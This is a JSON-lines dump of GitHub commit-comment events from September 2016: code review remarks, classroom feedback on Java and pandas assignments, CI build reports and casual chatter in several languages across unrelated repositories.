{"id":"4571807744","type":"CommitCommentEvent","actor":{"login":"li-xinyang"},"repo":{"name":"awpsawps12/FE_PairGame"},"payload":{"comment":{"id":19047525,"position":9,"line":165,"path":"src/index.jsx","commit_id":"5d8a6f92929198874b57dccbe7dbce9c334bd7f1","created_at":"2016-09-16T02:00:25Z","updated_at":"2016-09-16T02:00:25Z","body":"`console.log` 在生产环境里面需要全部取掉你不如直接写 `if`\r\n\r\n```js\r\nif (this.props.hasWon)\r\n  this.props.next()\r\n```"}},"created_at":"2016-09-16T02:00:25Z"}
{"id":"4571808970","type":"CommitCommentEvent","actor":{"login":"mike-tinyco"},"repo":{"name":"brooklynpacket/cocos2d-x"},"payload":{"comment":{"id":19047533,"position":172,"line":680,"path":"cocos/renderer/CCRenderer.cpp","commit_id":"8788dd3d19e8eec8e95712c7c1c6960a153b6b1e","created_at":"2016-09-16T02:00:52Z","updated_at":"2016-09-16T02:00:52Z","body":"Just wondering why you didn't elect to use `ssize_t` instead since `remaining` _could_ be negative value.  Your call, for all intents and purposes, should still work though."}},"created_at":"2016-09-16T02:00:52Z"}
{"id":"4571810586","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19047535,"position":66,"line":171,"path":"actl_test","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-16T02:01:34Z","updated_at":"2016-09-16T02:01:34Z","body":"Done."}},"created_at":"2016-09-16T02:01:34Z"}
{"id":"4571811654","type":"CommitCommentEvent","actor":{"login":"li-xinyang"},"repo":{"name":"awpsawps12/FE_PairGame"},"payload":{"comment":{"id":19047538,"position":24,"line":170,"path":"src/index.jsx","commit_id":"5d8a6f92929198874b57dccbe7dbce9c334bd7f1","created_at":"2016-09-16T02:02:01Z","updated_at":"2016-09-16T02:02:01Z","body":"ES6 之后全部用 template string 不要再用 字符连接了\r\n\r\n```js\r\nvarName = 1\r\nstr = `notif-${varName}`\r\n```"}},"created_at":"2016-09-16T02:02:01Z"}
{"id":"4571813180","type":"CommitCommentEvent","actor":{"login":"sasmita2"},"repo":{"name":"vaninarayana/gitTest"},"payload":{"comment":{"id":19047539,"position":null,"line":null,"path":null,"commit_id":"4eda0ee4eabad54a6517bb0a82392e8554655dbe","created_at":"2016-09-16T02:02:39Z","updated_at":"2016-09-16T02:02:39Z","body":"Testing "}},"created_at":"2016-09-16T02:02:39Z"}
{"id":"4571813289","type":"CommitCommentEvent","actor":{"login":"MAmelia"},"repo":{"name":"tec-webII-2n11/lucasDinalli-pedroMangino"},"payload":{"comment":{"id":19047540,"position":null,"line":null,"path":null,"commit_id":"4dc4f9f9114be2b8b3a1e6f8f6727da510af0182","created_at":"2016-09-16T02:02:41Z","updated_at":"2016-09-16T02:02:41Z","body":"Ótimo. Faltou o mapa de navegação e o wireframe"}},"created_at":"2016-09-16T02:02:41Z"}
{"id":"4571813354","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jpauley16"},"payload":{"comment":{"id":19047541,"position":56,"line":85,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"b5d720e8c3a0fa70e5f22c90b1b930f924a3edbb","created_at":"2016-09-16T02:02:42Z","updated_at":"2016-09-16T02:02:42Z","body":"Watch spacing after your java keywords.  This should be  for (String... "}},"created_at":"2016-09-16T02:02:42Z"}
{"id":"4571814582","type":"CommitCommentEvent","actor":{"login":"Kyle873"},"repo":{"name":"Team-Doominati/Doominati"},"payload":{"comment":{"id":19047546,"position":14,"line":168,"path":"doominati/main_doominati.cpp","commit_id":"6a0a1750bb84bccbb1c2ed4ff9870b5515ffb65b","created_at":"2016-09-16T02:03:12Z","updated_at":"2016-09-16T02:03:12Z","body":"[It is a mystery](https://www.youtube.com/watch?v=fq3abPnEEGE)"}},"created_at":"2016-09-16T02:03:12Z"}
{"id":"4571814921","type":"CommitCommentEvent","actor":{"login":"li-xinyang"},"repo":{"name":"awpsawps12/FE_PairGame"},"payload":{"comment":{"id":19047547,"position":29,"line":174,"path":"src/index.jsx","commit_id":"5d8a6f92929198874b57dccbe7dbce9c334bd7f1","created_at":"2016-09-16T02:03:21Z","updated_at":"2016-09-16T02:03:21Z","body":"不确定这个里面要不要写这种逻辑，因为如果之后做 i18n 会变的很长"}},"created_at":"2016-09-16T02:03:21Z"}
{"id":"4571815128","type":"CommitCommentEvent","actor":{"login":"eflamisa"},"repo":{"name":"eflamisa/fall-2016-week-1"},"payload":{"comment":{"id":19047548,"position":3,"line":1,"path":"helloworld.txt","commit_id":"884789eb624812967f99e02e1fdd515758fceb79","created_at":"2016-09-16T02:03:26Z","updated_at":"2016-09-16T02:03:26Z","body":"Hello, my name is Zeynep"}},"created_at":"2016-09-16T02:03:26Z"}
{"id":"4571815651","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19047551,"position":7,"line":98,"path":"amadeus/settings.py","commit_id":"f02ce614e72b2f90ecbbb52830dcb94cace64fe9","created_at":"2016-09-16T02:03:39Z","updated_at":"2016-09-16T02:03:39Z","body":"Ok, acabei de fazê-lo.\n\n2016-09-15 20:49 GMT-03:00 jailson-dias <notifications@github.com>:\n\n> Lembrar de colocar um arquivo local_settings e fazer o acesso ao seu banco\n> local por ele para não ficar acontecendo isso, pois não é legal ficar\n> mudando o usuário e a senha do banco a cada commit.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/amadeusproject/amadeuslms/commit/f02ce614e72b2f90ecbbb52830dcb94cace64fe9#commitcomment-19046513>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC2MQ52XGbhN-pWzd9hpbgWnIdiv1kQ0ks5qqdl8gaJpZM4J-eRL>\n> .\n>\n\n\n\n-- \nFelipe Bormann\nGraduated from : Escola Técnica Estadual Cícero Dias - Mount Pearl Senior\nHigh, Mount Pearl\nCourses on:\nMTA - Microsoft Technology Associate - Software Development Fundamental\nS2B Development - Student To Business\nStudies on: UFPE - cIn - Ciências da Computação\n"}},"created_at":"2016-09-16T02:03:39Z"}
{"id":"4571816659","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19047554,"position":20,"line":59,"path":"core/templates/base.html","commit_id":"4dc3a1374e717e3fe9be7be890befe52bf3c055f","created_at":"2016-09-16T02:04:04Z","updated_at":"2016-09-16T02:04:04Z","body":"Certo, vou criar uma Issue pra isso.\n\n2016-09-15 21:23 GMT-03:00 jailson-dias <notifications@github.com>:\n\n> Lembrar de colocar essa parte com um scroll, pois quando tem muitas\n> notificações elas ficam tomando a tela toda como nessa imagem\n> <http://www.cin.ufpe.br/%7Ejcd2/imagens/Notifica%e7%f5es.png>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/amadeusproject/amadeuslms/commit/4dc3a1374e717e3fe9be7be890befe52bf3c055f#commitcomment-19046773>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC2MQ1BJyuuOamql5SVmZhComW7zpFzNks5qqeFngaJpZM4J-fXj>\n> .\n>\n\n\n\n-- \nFelipe Bormann\nGraduated from : Escola Técnica Estadual Cícero Dias - Mount Pearl Senior\nHigh, Mount Pearl\nCourses on:\nMTA - Microsoft Technology Associate - Software Development Fundamental\nS2B Development - Student To Business\nStudies on: UFPE - cIn - Ciências da Computação\n"}},"created_at":"2016-09-16T02:04:04Z"}
{"id":"4571819176","type":"CommitCommentEvent","actor":{"login":"neoancient"},"repo":{"name":"MegaMek/mekhq"},"payload":{"comment":{"id":19047564,"position":null,"line":null,"path":null,"commit_id":"e5fc4cf2f0e28c06e23165c0140e53664e9e47fc","created_at":"2016-09-16T02:05:11Z","updated_at":"2016-09-16T02:05:11Z","body":"This looks like it might have been caused by an encoding problem. I suspect the ð should be ı and the þ should be ş."}},"created_at":"2016-09-16T02:05:11Z"}
{"id":"4571820689","type":"CommitCommentEvent","actor":{"login":"AndreKravcenko"},"repo":{"name":"latonita/SoftwareStepDirUnipolarDriver"},"payload":{"comment":{"id":19047569,"position":null,"line":null,"path":null,"commit_id":"3b91208796059db8a78692fce33510316398b30c","created_at":"2016-09-16T02:05:49Z","updated_at":"2016-09-16T02:05:49Z","body":"Yes... \"GRD\" is GND. My mystake. Sorry.\r\nPin 8 - from Arduino with GRBL -------- to Pin GND on Arduino2-Drive-Motor\r\n\r\nSee my CNC mill - That´s i call \"from scratch\" LOL.... : \r\nhttps://youtu.be/6wbK1HUdtEU"}},"created_at":"2016-09-16T02:05:49Z"}
{"id":"4571821443","type":"CommitCommentEvent","actor":{"login":"ykeer"},"repo":{"name":"mrshrdlu/gitignore-keil"},"payload":{"comment":{"id":19047572,"position":null,"line":null,"path":null,"commit_id":"8e5d6f8f3384ae0b90200ef02fb58a648e92953d","created_at":"2016-09-16T02:06:09Z","updated_at":"2016-09-16T02:06:09Z","body":"Thanks"}},"created_at":"2016-09-16T02:06:09Z"}
{"id":"4571821580","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jpauley16"},"payload":{"comment":{"id":19047574,"position":5,"line":42,"path":"src/test/java/edu/madisoncollege/entjava/ListTest.java","commit_id":"b5d720e8c3a0fa70e5f22c90b1b930f924a3edbb","created_at":"2016-09-16T02:06:11Z","updated_at":"2016-09-16T02:06:11Z","body":"is the really an Array? What might be a better method name?"}},"created_at":"2016-09-16T02:06:11Z"}
{"id":"4571823327","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jpauley16"},"payload":{"comment":{"id":19047582,"position":21,"line":58,"path":"src/test/java/edu/madisoncollege/entjava/ListTest.java","commit_id":"b5d720e8c3a0fa70e5f22c90b1b930f924a3edbb","created_at":"2016-09-16T02:06:36Z","updated_at":"2016-09-16T02:06:36Z","body":"Missing exception testing."}},"created_at":"2016-09-16T02:06:36Z"}
{"id":"4571823463","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19047583,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T02:06:40Z","updated_at":"2016-09-16T02:06:40Z","body":"https://github.com/LibreEHR/LibreEHR/pull/176/files\r\nGood work!"}},"created_at":"2016-09-16T02:06:40Z"}
{"id":"4571824463","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jpauley16"},"payload":{"comment":{"id":19047585,"position":38,"line":38,"path":"src/test/java/edu/madisoncollege/entjava/SantaTest.java","commit_id":"b5d720e8c3a0fa70e5f22c90b1b930f924a3edbb","created_at":"2016-09-16T02:07:06Z","updated_at":"2016-09-16T02:07:06Z","body":"You should have a method here that tests reading in a file.\r\n"}},"created_at":"2016-09-16T02:07:06Z"}
{"id":"4571828274","type":"CommitCommentEvent","actor":{"login":"maxsittipan"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19047596,"position":null,"line":null,"path":null,"commit_id":"3bf4a41ae6c459753cc5486d514d111723c33758","created_at":"2016-09-16T02:08:50Z","updated_at":"2016-09-16T02:08:50Z","body":"มีใครหลุดในแมพไหมครับ"}},"created_at":"2016-09-16T02:08:50Z"}
{"id":"4571828535","type":"CommitCommentEvent","actor":{"login":"awpsawps12"},"repo":{"name":"awpsawps12/FE_PairGame"},"payload":{"comment":{"id":19047598,"position":29,"line":174,"path":"src/index.jsx","commit_id":"5d8a6f92929198874b57dccbe7dbce9c334bd7f1","created_at":"2016-09-16T02:08:56Z","updated_at":"2016-09-16T02:08:56Z","body":"我也不确定 但是写外面感觉会很冗杂"}},"created_at":"2016-09-16T02:08:56Z"}
{"id":"4571829363","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"shepard-ohta/sfdat26_work"},"payload":{"comment":{"id":19047600,"position":null,"line":null,"path":null,"commit_id":"de5280272109b26af681b18934f5aad66c482024","created_at":"2016-09-16T02:09:14Z","updated_at":"2016-09-16T02:09:14Z","body":"Businesses\r\n\r\n- type(businesses.phone_number[0]) will give you the datatype of the item\r\n- # 4 - Almost all the way there!\r\ninspections['date'] = inspections['date'].apply(lambda x: pd.to_datetime(str(x), format='%Y%m%d'))\r\ninspections['month'] = inspections['month'].apply(lambda x: x.month)\r\ninspections.groupby('month').size().plot(kind='bar')\r\n- # 5 - Almost there - to look at the most high risk ones, you can filter for high risk:\r\nrestaurant_scores[restaurant_scores.risk_category == 'High Risk'].groupby('postal_code').size()\r\n- #6 - You can look at the distribution if you use value_counts() and put normalize=True in the parentheses: vio_bus_info.risk_category.value_counts(normalize=True)\r\n\r\nMorbid\r\n\r\n- # 3 - You can use inplace=True to make sure that the values are changed (instead of just the view): killings['streetaddress'].fillna(\"Unknown\", inplace=True)\r\n- # 7 - To print a percentage, you can use \"{0:.2f}%\".format((unarmed_killings*1.0)/total_killings)\r\n- # 11 - You don't need to use groupby for the histogram: killings.age.hist(by=killings.race,sharex=True, sharey=True, bins=killings.age.nunique(), figsize=(10,10))\r\n\r\nLess Morbid\r\n\r\n- # 1 - You need to put the parameter axis=1 in the .drop() method if you want to drop columns, and you should put inplace=True if you want to change the data instead of changing the view: majors.drop(['Employed_full_time_year_round', 'Major_code'], axis=1, inplace=True)\r\n- # 4 - To get the right labels, you can use x='Major' as a paramater in the .bar() method: majors[['Major','Median']].sort_values('Median', ascending=False).head(10).plot.bar(x='Major')\r\n- # 8 - This looks cool! I think you were supposed to create a series of different plots though: majors.Median.hist(by=majors.Major_category, sharex=True, sharey=True, figsize=(10,12))\r\n"}},"created_at":"2016-09-16T02:09:14Z"}
{"id":"4571830409","type":"CommitCommentEvent","actor":{"login":"awpsawps12"},"repo":{"name":"awpsawps12/FE_PairGame"},"payload":{"comment":{"id":19047602,"position":9,"line":165,"path":"src/index.jsx","commit_id":"5d8a6f92929198874b57dccbe7dbce9c334bd7f1","created_at":"2016-09-16T02:09:38Z","updated_at":"2016-09-16T02:09:38Z","body":"那里的逻辑还没写完，所以就先 `console.log` 了"}},"created_at":"2016-09-16T02:09:38Z"}
{"id":"4571831826","type":"CommitCommentEvent","actor":{"login":"LabLayers"},"repo":{"name":"Poniverse/Poniverse.net"},"payload":{"comment":{"id":19047605,"position":null,"line":null,"path":null,"commit_id":"8d05b53e7a22d7b41cc7bf468653e9aa097efaba","created_at":"2016-09-16T02:10:12Z","updated_at":"2016-09-16T02:10:12Z","body":"You really do need sleep"}},"created_at":"2016-09-16T02:10:12Z"}
{"id":"4571834638","type":"CommitCommentEvent","actor":{"login":"JunTaoLuo"},"repo":{"name":"aspnet/ResponseCaching"},"payload":{"comment":{"id":19047613,"position":18,"line":41,"path":"src/Microsoft.AspNetCore.ResponseCaching/Internal/DistributedResponseCacheStore.cs","commit_id":"263b54a52b306a65e0aa7557edb9d9afddca06db","created_at":"2016-09-16T02:11:31Z","updated_at":"2016-09-16T02:11:31Z","body":"Create a new task request"}},"created_at":"2016-09-16T02:11:31Z"}
{"id":"4571836005","type":"CommitCommentEvent","actor":{"login":"JunTaoLuo"},"repo":{"name":"aspnet/ResponseCaching"},"payload":{"comment":{"id":19047620,"position":16,"line":32,"path":"src/Microsoft.AspNetCore.ResponseCaching/Internal/MemoryResponseCacheStore.cs","commit_id":"263b54a52b306a65e0aa7557edb9d9afddca06db","created_at":"2016-09-16T02:12:03Z","updated_at":"2016-09-16T02:12:03Z","body":"Creating a new Task per call"}},"created_at":"2016-09-16T02:12:03Z"}
{"id":"4571842618","type":"CommitCommentEvent","actor":{"login":"neoancient"},"repo":{"name":"MegaMek/mekhq"},"payload":{"comment":{"id":19047630,"position":null,"line":null,"path":null,"commit_id":"4d126f1abcf41d0d5c5006a9cdbb46d48842ae95","created_at":"2016-09-16T02:15:00Z","updated_at":"2016-09-16T02:15:00Z","body":"Yes, I failed to notice that the commit that specifically mentioned the addition of a file did not in fact include that file.\r\n\r\nThe button would have no effect on newly added SPAs. They should be added to the preset."}},"created_at":"2016-09-16T02:15:00Z"}
{"id":"4571845407","type":"CommitCommentEvent","actor":{"login":"pringers"},"repo":{"name":"pringers/usd.pw"},"payload":{"comment":{"id":19047639,"position":null,"line":null,"path":null,"commit_id":"3843737fb784e7ea76f6010fe77695fa45b932a7","created_at":"2016-09-16T02:16:16Z","updated_at":"2016-09-16T02:16:16Z","body":":("}},"created_at":"2016-09-16T02:16:16Z"}
{"id":"4571848570","type":"CommitCommentEvent","actor":{"login":"auremoser"},"repo":{"name":"mozilla/science.mozilla.org"},"payload":{"comment":{"id":19047647,"position":null,"line":null,"path":null,"commit_id":"fcdfd7a67b1f50e59c312ce2e14d8042ac4bad79","created_at":"2016-09-16T02:17:42Z","updated_at":"2016-09-16T02:17:42Z","body":"Derp, I messed up the links for the fellows and just fixed them, @alanmoo do I need to PR this adjustment to master, or do you typically batch migrate several recent commits from staging (`develop`) to live (`master`)?"}},"created_at":"2016-09-16T02:17:42Z"}
{"id":"4571848945","type":"CommitCommentEvent","actor":{"login":"leeight"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19047648,"position":7,"line":104,"path":"Libraries/Interaction/InteractionManager.js","commit_id":"3b5e4cc59331b49d2ab8cf2fed74dabd2251fe9c","created_at":"2016-09-16T02:17:50Z","updated_at":"2016-09-16T02:17:50Z","body":"Missing `return`?"}},"created_at":"2016-09-16T02:17:50Z"}
{"id":"4571849218","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-amills76"},"payload":{"comment":{"id":19047652,"position":null,"line":null,"path":null,"commit_id":"ca138711598ac828d694d84ea63d4808546e8d36","created_at":"2016-09-16T02:17:59Z","updated_at":"2016-09-16T02:17:59Z","body":"Correct!  Did you explore what lines of code were not tested?"}},"created_at":"2016-09-16T02:17:59Z"}
{"id":"4571852322","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-amills76"},"payload":{"comment":{"id":19047656,"position":41,"line":70,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"c1a0a8207597d992981000e2c4708962331c154d","created_at":"2016-09-16T02:19:23Z","updated_at":"2016-09-16T02:19:23Z","body":"If you are not using try-with-resources, remember to close your file"}},"created_at":"2016-09-16T02:19:23Z"}
{"id":"4571853756","type":"CommitCommentEvent","actor":{"login":"andreabedini"},"repo":{"name":"PyTables/PyTables"},"payload":{"comment":{"id":19047661,"position":null,"line":null,"path":null,"commit_id":"11bd422201b674b60fb46439f68eb28d74356e40","created_at":"2016-09-16T02:20:04Z","updated_at":"2016-09-16T02:20:04Z","body":"If you don't mind me to ask, what was the problem with that line in Python2?"}},"created_at":"2016-09-16T02:20:04Z"}
{"id":"4571854047","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-amills76"},"payload":{"comment":{"id":19047663,"position":36,"line":65,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"c1a0a8207597d992981000e2c4708962331c154d","created_at":"2016-09-16T02:20:12Z","updated_at":"2016-09-16T02:20:12Z","body":"printStackTrace will go to the console or server log - remember to log the stack trace as well.  logger.error(\"Failure during file read\", ioEx);"}},"created_at":"2016-09-16T02:20:12Z"}
{"id":"4571855130","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047666,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-16T02:20:36Z","updated_at":"2016-09-16T02:20:36Z","body":"FixAgainCentroidForNonConvex (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2336 of 2337 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T02:20:36Z"}
{"id":"4571856728","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-amills76"},"payload":{"comment":{"id":19047674,"position":28,"line":28,"path":"src/test/java/edu/madisoncollege/entjava/SantaInAnElevatorTest.java","commit_id":"c1a0a8207597d992981000e2c4708962331c154d","created_at":"2016-09-16T02:21:16Z","updated_at":"2016-09-16T02:21:16Z","body":"Good work testing.  What else could you have tested to get 100% line coverage?"}},"created_at":"2016-09-16T02:21:16Z"}
{"id":"4571861496","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19047695,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T02:23:24Z","updated_at":"2016-09-16T02:23:24Z","body":"Any popcorn left @koradiavatsal?"}},"created_at":"2016-09-16T02:23:24Z"}
{"id":"4571871876","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":19047730,"position":null,"line":null,"path":null,"commit_id":"46626600d120dc48ab605265677b858506a81011","created_at":"2016-09-16T02:27:59Z","updated_at":"2016-09-16T02:27:59Z","body":"你这写的太low了"}},"created_at":"2016-09-16T02:27:59Z"}
{"id":"4571873707","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-paigeyahnke"},"payload":{"comment":{"id":19047735,"position":40,"line":69,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"0c422e8fd71450af2aa26db1b0ab0e7d8b0eb2df","created_at":"2016-09-16T02:28:53Z","updated_at":"2016-09-16T02:28:53Z","body":"good use of try with resources.\r\n"}},"created_at":"2016-09-16T02:28:53Z"}
{"id":"4571874080","type":"CommitCommentEvent","actor":{"login":"fumikito"},"repo":{"name":"hametuha/hametuha"},"payload":{"comment":{"id":19047737,"position":null,"line":null,"path":null,"commit_id":"a75f75ef572084e8b36a72eec694892281da7533","created_at":"2016-09-16T02:29:02Z","updated_at":"2016-09-16T02:29:02Z","body":"close #22 "}},"created_at":"2016-09-16T02:29:02Z"}
{"id":"4571875076","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-paigeyahnke"},"payload":{"comment":{"id":19047741,"position":54,"line":83,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"0c422e8fd71450af2aa26db1b0ab0e7d8b0eb2df","created_at":"2016-09-16T02:29:28Z","updated_at":"2016-09-16T02:29:28Z","body":"good logging! No system.out.printlns or printStackTrace's"}},"created_at":"2016-09-16T02:29:28Z"}
{"id":"4571878316","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-paigeyahnke"},"payload":{"comment":{"id":19047755,"position":18,"line":18,"path":"src/test/java/edu/madisoncollege/entjava/SantaInAnElevatorTest.java","commit_id":"0c422e8fd71450af2aa26db1b0ab0e7d8b0eb2df","created_at":"2016-09-16T02:30:50Z","updated_at":"2016-09-16T02:30:50Z","body":"What other tests could you have included to get to 100% line code coverage?"}},"created_at":"2016-09-16T02:30:50Z"}
{"id":"4571882281","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"Dipanker-ktm/sfdat26_work"},"payload":{"comment":{"id":19047772,"position":null,"line":null,"path":null,"commit_id":"596a004790f3a00200dba70f954b4dc78824db2d","created_at":"2016-09-16T02:32:43Z","updated_at":"2016-09-16T02:32:43Z","body":"Businesses\r\n- # 4 looks great. You can also convert it to a date like so:\r\nfrom datetime import datetime\r\ninspections['date'] = inspections['date'].apply(lambda x: pd.to_datetime(str(x), format='%Y%m%d'))\r\ninspections['month'] = inspections['month'].apply(lambda x: x.month)\r\ninspections.groupby('month').size().plot(kind='bar')\r\n- # 6 You can look at the distribution of values if you use normalize=True as a parameter in the value_counts() method:\r\nresults[results.type == 'New Ownership'].risk_category.value_counts(normalize=True)\r\n\r\nMorbid\r\n- # 7 - to print a percentage, you can use \"{0:.2f}%\".format(result*100)\r\n- # 11 - you can view the plots side by side if you use this:\r\nkillings.age.hist(by=killings.race,sharex=True, sharey=True, bins=killings.age.nunique(), figsize=(10,10))\r\n\r\nLess Morbid\r\n- # 3 -  I know we already discussed double bracket notation for selecting multiple columns in class, but just reiterating this will work :)\r\nmajors[['Major', 'Median']].sort_values('Median', ascending = False).head(10)\r\n- # 4 - Nice plot!\r\n- # 6 - You have to sort to get the top 5:\r\nmajors.groupby(\"Major_category\").Median.mean().sort_values(ascending=False)[:5]\r\n- # 8 - This might be a little easier to read:\r\nmajors['Median'].hist(by=majors['Major_category'], sharex = True, sharey = True, figsize=(15,10))\r\n"}},"created_at":"2016-09-16T02:32:43Z"}
{"id":"4571885879","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19047776,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T02:34:20Z","updated_at":"2016-09-16T02:34:20Z","body":"Thank you."}},"created_at":"2016-09-16T02:34:20Z"}
{"id":"4571886764","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19047781,"position":null,"line":null,"path":null,"commit_id":"773b3c300d19a29947cd3e5419b1f74f2cf28d22","created_at":"2016-09-16T02:34:47Z","updated_at":"2016-09-16T02:34:47Z","body":"OMIT"}},"created_at":"2016-09-16T02:34:47Z"}
{"id":"4571887843","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19047786,"position":null,"line":null,"path":null,"commit_id":"106e77ae771c09bcb706e4be08007e947da395a6","created_at":"2016-09-16T02:35:20Z","updated_at":"2016-09-16T02:35:20Z","body":"OMIT"}},"created_at":"2016-09-16T02:35:20Z"}
{"id":"4571888244","type":"CommitCommentEvent","actor":{"login":"pkjeansouza"},"repo":{"name":"capsuletechnology/ProjetoAgenda"},"payload":{"comment":{"id":19047790,"position":null,"line":null,"path":null,"commit_id":"0c5b6d3251a81040b59a7bc664c378d5480ed4f5","created_at":"2016-09-16T02:35:30Z","updated_at":"2016-09-16T02:35:30Z","body":"Olha como vai o commit do prata !!"}},"created_at":"2016-09-16T02:35:30Z"}
{"id":"4571889885","type":"CommitCommentEvent","actor":{"login":"IAGAdmin"},"repo":{"name":"indautgrp/erpnext"},"payload":{"comment":{"id":19047796,"position":null,"line":null,"path":null,"commit_id":"0673c93c1d50801c21df701a0289351488d514f3","created_at":"2016-09-16T02:36:16Z","updated_at":"2016-09-16T02:36:16Z","body":"https://github.com/indautgrp/iag_custom/issues/34"}},"created_at":"2016-09-16T02:36:16Z"}
{"id":"4571890660","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19047798,"position":null,"line":null,"path":null,"commit_id":"db7ad8647dbb51a3c3bcbe15dd98a65081cd53f3","created_at":"2016-09-16T02:36:38Z","updated_at":"2016-09-16T02:36:38Z","body":"it doesn't not stack my be some Tesseractor wrong but it wrong some value not all 1-100\r\nit is not problem it check only 100/100 to change profile\r\nyou should post full log file with export button\r\ni use this build it working  when reach 100 it change profile automatic"}},"created_at":"2016-09-16T02:36:38Z"}
{"id":"4571892092","type":"CommitCommentEvent","actor":{"login":"Everton747"},"repo":{"name":"capsuletechnology/ProjetoAgenda"},"payload":{"comment":{"id":19047799,"position":null,"line":null,"path":null,"commit_id":"0c5b6d3251a81040b59a7bc664c378d5480ed4f5","created_at":"2016-09-16T02:37:18Z","updated_at":"2016-09-16T02:37:18Z","body":"Já é o hello world?"}},"created_at":"2016-09-16T02:37:18Z"}
